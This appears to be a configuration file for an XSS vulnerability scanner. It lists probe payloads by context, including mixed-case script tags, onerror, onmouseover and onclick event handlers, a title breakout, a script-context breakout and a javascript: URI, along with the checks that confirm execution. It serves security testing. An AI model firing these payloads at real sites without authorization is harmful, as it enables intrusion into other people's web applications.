xss:
  html:
    [
      {
        PayLoad: "()%26%25<acx><ScRiPt%20>flag</ScRiPt>",
        CheckTag: "script",
        CheckType: "Value",
      },
      {
      PayLoad: "<ScRiPt>flag</sCrIpT>",
      CheckTag: "script",
      CheckType: "Value",
      },
      {
        PayLoad: "<img src/onerror='flag'/>",
        CheckTag: "img",
        CheckType: "Value",
      },
      {
        PayLoad: "<details onclick='flag'>", 
        CheckTag: "details",
        CheckType: "Value",
      },
      {
        PayLoad: "</title><h1>flag</h1>", 
        CheckTag: "h1",
        CheckType: "Value",
      },
    ]
  attibute:
  #"onmouseover='LI5h(93812)'bad="

    [

      {
        PayLoad: "1%22onmouseover=flag(95102)%22",
        CheckTag: "key",
        CheckType: "Value",
      },

      {
        PayLoad: ";\"%3B1%2522onmouseover%3Dflag(95102)%2522\"",
        CheckTag: "key",
        CheckType: "Value",
      },

      # {
      #   PayLoad: "'><flag>//",
      #   CheckTag: "flag",
      #   CheckType: "Value",
      # }, 
    ]
  script:
    [


      {
      PayLoad: "lili'</script><script>console.log('flag');</script>",
      CheckTag: "",
      CheckType: "Console",
      },
      
      {
      PayLoad: "javascript:console.log('flag')",
      CheckTag: "",
      CheckType: "Console",
      },

      # {
      # PayLoad: "';alert(flag);//",  这个检测太慢了，改其他的
      # CheckTag: "",
      # CheckType: "Dialog",
      # },
    ]
